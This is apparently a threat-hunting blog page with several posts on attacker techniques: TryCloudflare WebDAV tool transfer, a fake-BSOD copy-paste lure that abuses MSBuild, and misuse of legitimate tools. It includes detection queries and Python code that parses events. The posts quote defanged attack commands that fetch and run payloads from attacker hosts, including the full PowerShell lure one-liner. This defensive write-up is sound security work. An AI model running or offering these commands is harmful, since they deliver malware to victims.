Posts

368. Hunting for TryCloudflare Abuse

Hello everyone! As you know, attackers often abuse legitimate web services, for example to exfiltrate data or to download tools. Today we'll look at another such service, TryCloudflare, and examine how attackers use it for Ingress Tool Transfer (T1105). TryCloudflare makes it possible to expose a local service to the Internet, with access provided via a Cloudflare-generated domain, for example: plus-condos-thy-redeem.trycloudflare[.]com

Let's look at a recent example demonstrating abuse of this service. First, a WebDAV connection to the server is established (this rundll32 davclnt.dll,DavSetCookie invocation is what the Windows WebClient service runs when a WebDAV share on the host is first accessed, so it is the earliest trace of the connection):

rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare[.]com@SSL https://plus-condos-thy-redeem.trycloudflare[.]com/

Second, they fetch and run malicious scripts: a .wsh file is executed straight from the WebDAV share, and PowerShell downloads more:

"C:\WINDOWS\System32\WScript.exe" "\\plus-condos-thy-redeem.trycloudflare[.]com@SSL\DavWWWRoot\as.wsh"

powershell -Command "iwr 'https://plus-condos-thy-redeem.tr...
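To show what this chain looks like to a detection engineer, here is an added example in Python (my own code, not from the original post) that pulls the three stages out of process-creation events: the DavSetCookie call, the \\host@SSL\DavWWWRoot UNC path, and the PowerShell download from the tunnel domain. The field names (proc_file_path, cmdline) follow the query style used on this blog; the sample events are constructed to mirror the commands above, and the refang() helper is an assumption of mine so the same rules also run over defanged IOCs copied from reports.

```python
import re
from dataclasses import dataclass

# Cloudflare quick tunnels expose a local service under a random subdomain of trycloudflare.com.
TRYCLOUDFLARE_HOST = re.compile(r"^[a-z0-9-]+\.trycloudflare\.com$", re.IGNORECASE)

# rundll32 davclnt.dll,DavSetCookie <host>@SSL <url>: the WebClient service runs this when a
# WebDAV share on <host> is first accessed, so it is the earliest trace of the connection.
DAVSETCOOKIE = re.compile(r"davclnt\.dll\s*,\s*DavSetCookie\s+([^\s@]+)", re.IGNORECASE)

# \\host@SSL\DavWWWRoot\file: UNC path to a WebDAV-over-HTTPS share (an "@443" port suffix is optional).
WEBDAV_UNC = re.compile(r"\\\\([a-z0-9.-]+)@SSL(?:@\d+)?\\DavWWWRoot\\([^\s\"']+)", re.IGNORECASE)

# PowerShell download cmdlets (and their aliases) followed by a URL on the tunnel domain.
DOWNLOAD = re.compile(
    r"\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod|curl|wget)\b[^;|]*?https?://([a-z0-9-]+\.trycloudflare\.com)",
    re.IGNORECASE,
)


def refang(text: str) -> str:
    """Undo report-style defanging (hxxp, [.]) so the rules work on IOC write-ups as well as raw telemetry."""
    return text.replace("[.]", ".").replace("hxxp", "http")


@dataclass(frozen=True)
class Finding:
    stage: str  # webdav_connect, webdav_exec or download
    host: str   # the trycloudflare.com hostname involved
    image: str  # basename of the process that did it


def analyze_event(event: dict) -> list[Finding]:
    """Return the TryCloudflare/WebDAV ingress indicators in one process-creation event.
    Field names (proc_file_path, cmdline) follow the query style used on this blog."""
    cmd = refang(event.get("cmdline", ""))
    image = event.get("proc_file_path", "").rsplit("\\", 1)[-1].lower()
    found = []
    m = DAVSETCOOKIE.search(cmd)
    if m and image == "rundll32.exe" and TRYCLOUDFLARE_HOST.match(m.group(1)):
        found.append(Finding("webdav_connect", m.group(1).lower(), image))
    for host, _path in WEBDAV_UNC.findall(cmd):
        if TRYCLOUDFLARE_HOST.match(host):
            found.append(Finding("webdav_exec", host.lower(), image))
    for host in DOWNLOAD.findall(cmd):
        found.append(Finding("download", host.lower(), image))
    return found


def hunt(events: list[dict]) -> list[Finding]:
    """Run analyze_event over a batch of events and flatten the results."""
    return [f for e in events for f in analyze_event(e)]


# Constructed sample events modelled on the chain in the post (not real telemetry).
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_path": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare.com@SSL https://plus-condos-thy-redeem.trycloudflare.com/"},
    {"event_type": "processcreatewin", "proc_file_path": r"C:\WINDOWS\System32\WScript.exe",
     "cmdline": r'"C:\WINDOWS\System32\WScript.exe" "\\plus-condos-thy-redeem.trycloudflare.com@SSL\DavWWWRoot\as.wsh"'},
    {"event_type": "processcreatewin", "proc_file_path": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command \"iwr 'https://plus-condos-thy-redeem.trycloudflare.com/x.ps1' -OutFile $env:TEMP\\x.ps1\""},
    # Benign noise: a corporate WebDAV share and a plain cmd.exe, neither should match.
    {"event_type": "processcreatewin", "proc_file_path": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie sharepoint.corp.example@SSL https://sharepoint.corp.example/"},
    {"event_type": "processcreatewin", "proc_file_path": r"C:\WINDOWS\system32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Each stage on its own is weak evidence (corporate WebDAV shares trigger DavSetCookie all day), so the value is in the host filter and in seeing the three stages from one endpoint in sequence.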

367. Adversaries Use a Fake BSOD to Make a Victim Run a Malicious Command

Hello everyone! Why are phishing emails needed if victims can run a malicious command themselves? Yes, today we're once again looking at an interesting variant of User Execution: Malicious Copy and Paste (T1204.004). In fact, phishing emails were still involved: this time the attackers disguised themselves as Booking.com. The email contained a link leading to a phishing website. When the victim clicked the "Refresh page" button, the browser switched to full-screen mode and displayed the familiar instruction to copy and paste a malicious command, this time cleverly disguised as a Blue Screen of Death.

As for the command itself, it was also quite interesting and included Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001):

powershell -c "start hxxps://admin.booking[.]com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj"

It opens admin.booking[.]com in the browser as a decoy, searches C:\ recursively for msbuild.exe, downloads a project file to %ProgramData%\v.proj and then builds it with MSBuild, which is how the attacker's code in the project file gets executed.

Detection: Pay attention to file...
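As an added example (not part of the original post), the following Python breaks a copy-paste lure like this one into its statements and classifies each stage, so the decoy URL, the payload URL, the staged .proj file and the MSBuild invocation can be pulled out for triage. The sample command is the one from the post, defanged as above; the statement-level parsing, the stage labels and the verdict rule (msbuild.exe discovery, download of a project file, build of that same file via the same variable) are my own assumptions about how to triage such lures, not the author's detection logic.

```python
import re
from dataclasses import dataclass


@dataclass
class Stage:
    kind: str        # decoy, find_msbuild, download, build or other
    text: str        # the statement as written
    url: str = ""    # URL the statement opens or fetches
    path: str = ""   # local file it writes or builds
    var: str = ""    # variable it assigns (find_msbuild) or invokes (build)


URL = re.compile(r"https?://[^\s\"';]+", re.IGNORECASE)
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=")
DECOY = re.compile(r"^(?:start|Start-Process|saps)\s+(https?://\S+)", re.IGNORECASE)
FIND_MSBUILD = re.compile(r"\b(?:gci|ls|dir|Get-ChildItem)\b.*-filter\s+msbuild\.exe", re.IGNORECASE)
DOWNLOAD = re.compile(
    r"\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod|curl|wget)\b.*?\s-o(?:utfile)?\s+(\S+)", re.IGNORECASE
)
BUILD = re.compile(r"&\s*(\$\w+)\s+(\S+\.proj)\b", re.IGNORECASE)


def refang(text: str) -> str:
    """Undo report-style defanging (hxxp, [.]) so a command copied from a write-up can be analysed."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def unwrap_command(cmdline: str) -> str:
    """Pull the script body out of `powershell -c "..."` / `-Command "..."` (straight or smart quotes).
    Returns the input unchanged if no such wrapper is found."""
    m = re.search(r"-(?:c|command)\s+[\"“]?(.*?)[\"”]?\s*$", cmdline, re.IGNORECASE | re.DOTALL)
    return m.group(1) if m else cmdline


def split_statements(script: str) -> list[str]:
    """Split on ';' outside single/double quotes; enough for the one-liners these lures use."""
    out, buf, quote = [], [], None
    for ch in script:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == ";":
            out.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    tail = "".join(buf).strip()
    return [s for s in out + [tail] if s]


def classify(stmt: str) -> Stage:
    """Label one statement by the role it plays in the chain."""
    if m := DECOY.match(stmt):
        return Stage("decoy", stmt, url=m.group(1))
    if FIND_MSBUILD.search(stmt):
        a = ASSIGN.match(stmt)
        return Stage("find_msbuild", stmt, var=a.group(1) if a else "")
    if m := DOWNLOAD.search(stmt):
        u = URL.search(stmt)
        return Stage("download", stmt, url=u.group(0) if u else "", path=m.group(1))
    if m := BUILD.search(stmt):
        return Stage("build", stmt, path=m.group(2), var=m.group(1))
    return Stage("other", stmt)


def analyze(cmdline: str) -> dict:
    """Classify every statement of a copy-paste lure and decide whether it chains
    msbuild.exe discovery -> download of a project file -> build of that same file (T1127.001)."""
    stages = [classify(s) for s in split_statements(unwrap_command(refang(cmdline)))]
    finder = next((s for s in stages if s.kind == "find_msbuild"), None)
    downloads = [s for s in stages if s.kind == "download"]
    builds = [s for s in stages if s.kind == "build"]
    chained = finder is not None and any(
        b.var == finder.var and any(d.path.lower() == b.path.lower() for d in downloads) for b in builds
    )
    verdict = "msbuild_proxy_execution" if chained else "suspicious" if (finder or builds) else "benign"
    return {
        "verdict": verdict,
        "kinds": [s.kind for s in stages],
        "decoy_url": next((s.url for s in stages if s.kind == "decoy"), ""),
        "payload_url": next((d.url for d in downloads), ""),
        "staged_file": next((d.path for d in downloads), ""),
    }


# The command from the post, defanged as in the write-up (constructed input for this example).
SAMPLE_LURE = (
    'powershell -c "start hxxps://admin.booking[.]com;'
    r"$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;"
    r"iwr hxxps://2fa-bns[.]com/ -o $env:ProgramData\v.proj;"
    r'& $msb $env:ProgramData\v.proj"'
)

if __name__ == "__main__":
    print(analyze(SAMPLE_LURE))
```

The decoy stage is worth keeping in the output: a legitimate-looking URL opening in the browser is exactly what makes the victim believe the "fix" worked, and it is also a handy pivot when you look for other lures from the same campaign.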

366. Adversaries Started to Abuse Controlio

Hello everyone! I promised to keep posting and to notify you of any interesting tactics, techniques and procedures. So, let's start the new year! Harlan Carvey (I'm sure you've read his books!) shared that adversaries have started to use Controlio, a cloud-based employee monitoring and productivity analytics platform. By the way, it's not the first time adversaries have used similar tools. Another example is Rare Werewolf: the adversary leveraged Mipko Employee Monitor.

Look for suspicious communications with controlio[.]net:

event_type: "dnsreqwin" AND dns_rname: "controlio.net"

Look for suspicious executions of Controlio-related binaries:

event_type: "processcreatewin" AND proc_file_productname: "controlio"

Happy hunting!

365. The Zeltser Challenge Completed

Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post for the Zeltser challenge! It was definitely a hard one, but still it was fun! Thank you, Dave, for motivating me to start it! Thanks to everyone who reacted to the posts and wrote kind words; it helped me a lot to finish it! It doesn't mean I'll stop posting! But I won't do it every day! Still, if I see something interesting, I'll share it with you! Thank you for reading the blog and see you next year!

364. Another RMM in a Ransomware Affiliate's Toolkit

Hello everyone! Today we'll look at another example of a very common technique, Remote Access Tools: Remote Desktop Software (T1219.002). Ransomware gangs have lots of such tools in their arsenal. For example, Power Admin, a legitimate tool that monitors servers and applications and audits file access. Of course, it may be a good target for detection and hunting, for example:

event_type: "processcreatewin" AND proc_file_productname: "pa server monitor"

See you tomorrow!

363. That's How Arcane Werewolf Abuses Conhost

Hello everyone! We often talk about (and, of course, see) LOLBAS. So, let's look at another one, which became really popular among adversaries this year. Today's example is Arcane Werewolf. The adversary leverages conhost.exe to run the dropper:

conhost.exe C:\Users\<USER>\AppData\Local\Temp\icon2.png

One more example, running the Loki 2.0 loader:

conhost.exe %TEMP%\chrome_proxy.pdf

As you can see, the threat actor uses quite suspicious file extensions for these payloads, so we can use them to build a query:

event_type: "processcreatewin" AND proc_file_path: "conhost.exe" AND cmdline: (*png OR *pdf)

See you tomorrow!

362. Ransomware Gangs Use This Tool for Discovery

Hello everyone! Today we'll talk about how ransomware gangs abuse legitimate software for File and Directory Discovery (T1083). Our example for today's post is NightSpire. Among other tools, the gang leveraged Everything, a legitimate file search tool that lets an adversary index files and get a deeper understanding of the data available on the compromised system. So, this tool, especially if it's not widely used internally, may be a good target for hunting:

event_type: "processcreatewin" AND proc_file_originalfilename: "everything.exe"

See you tomorrow!
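The hunting queries in posts 366, 364, 363 and 362 all share one shape: field: "value" terms joined by AND, with an optional (a OR b) group and * wildcards. As an added example, not code from the blog or from the platform behind these queries, here is a small Python evaluator for exactly that shape, run over constructed sample events. The matching semantics are my assumption, since the posts don't spell them out: a wildcard value globs the whole field value, and a plain value must equal the field or its last path component, case-insensitively (so proc_file_path: "conhost.exe" hits C:\Windows\System32\conhost.exe). Note that the ordinary conhost.exe 0x4 launch in the sample does not match the Arcane Werewolf query, which is the point of the *png OR *pdf group.

```python
import re
from fnmatch import fnmatchcase

# One term: `field: "value"` or `field: (v1 OR v2 ...)`.
TERM = re.compile(r'(\w+):\s*(?:"([^"]*)"|\(([^)]*)\))')


def parse_query(query: str) -> list[tuple[str, list[str]]]:
    """Turn `f1: "v" AND f2: (*a OR *b)` into [("f1", ["v"]), ("f2", ["*a", "*b"])].
    Only AND between terms and OR inside a group are supported, which is all these posts use;
    anything else (top-level OR, NOT, bare words) raises so a query is never silently mis-read."""
    terms = []
    for field, quoted, group in TERM.findall(query):
        values = [v.strip().strip('"') for v in re.split(r"\s+OR\s+", group)] if group else [quoted]
        terms.append((field, values))
    leftover = re.sub(r"\bAND\b|\s+", "", TERM.sub("", query))
    if not terms or leftover:
        raise ValueError(f"unsupported query syntax: {query!r}")
    return terms


def value_matches(actual: str, pattern: str) -> bool:
    """Assumed semantics: a wildcard pattern globs the whole field value;
    a plain value must equal the field or its last path component. Both case-insensitive."""
    actual, pattern = actual.lower(), pattern.lower()
    if "*" in pattern:
        return fnmatchcase(actual, pattern)
    return actual == pattern or actual.rsplit("\\", 1)[-1] == pattern


def event_matches(event: dict, terms: list[tuple[str, list[str]]]) -> bool:
    """AND across terms, OR across the values of one term."""
    return all(any(value_matches(str(event.get(field, "")), v) for v in values) for field, values in terms)


def run_query(query: str, events: list[dict]) -> list[dict]:
    terms = parse_query(query)
    return [e for e in events if event_matches(e, terms)]


# The queries as written in the posts.
Q_CONTROLIO_DNS = 'event_type: "dnsreqwin" AND dns_rname: "controlio.net"'
Q_CONTROLIO_PROC = 'event_type: "processcreatewin" AND proc_file_productname: "controlio"'
Q_PA_SERVER_MONITOR = 'event_type: "processcreatewin" AND proc_file_productname: "pa server monitor"'
Q_CONHOST = 'event_type: "processcreatewin" AND proc_file_path: "conhost.exe" AND cmdline: (*png OR *pdf)'
Q_EVERYTHING = 'event_type: "processcreatewin" AND proc_file_originalfilename: "everything.exe"'

# Constructed sample events (not real telemetry); ids make the results easy to check.
EVENTS = [
    {"id": 1, "event_type": "dnsreqwin", "dns_rname": "controlio.net"},
    {"id": 2, "event_type": "processcreatewin", "proc_file_path": r"C:\Program Files\Controlio\controlio.exe",
     "proc_file_productname": "Controlio"},
    {"id": 3, "event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"conhost.exe C:\Users\bob\AppData\Local\Temp\icon2.png"},
    # A normal console host launch: same image, but the command line does not end in png/pdf.
    {"id": 4, "event_type": "processcreatewin", "proc_file_path": r"\??\C:\Windows\system32\conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"id": 5, "event_type": "processcreatewin", "proc_file_path": r"C:\Tools\Everything\Everything.exe",
     "proc_file_originalfilename": "Everything.exe"},
    {"id": 6, "event_type": "processcreatewin", "proc_file_path": r"C:\Program Files\PA Server Monitor\PAServerMonitor.exe",
     "proc_file_productname": "PA Server Monitor"},
    # A PDF opened by a reader, not by conhost.
    {"id": 7, "event_type": "processcreatewin", "proc_file_path": r"C:\Program Files\Reader\reader.exe",
     "cmdline": r"reader.exe C:\Users\bob\Downloads\invoice.pdf"},
]


def ids(query: str) -> list[int]:
    """Ids of the sample events a query matches, in input order."""
    return [e["id"] for e in run_query(query, EVENTS)]


if __name__ == "__main__":
    for q in (Q_CONTROLIO_DNS, Q_CONTROLIO_PROC, Q_PA_SERVER_MONITOR, Q_CONHOST, Q_EVERYTHING):
        print(ids(q), q)
```

Checking a query against a handful of hand-built true positives and near misses like this, before it goes into the SIEM, is a cheap way to catch a term that is silently too broad (a bare "conhost.exe" on cmdline) or too narrow (a product-name string that differs in case from what the binary actually carries).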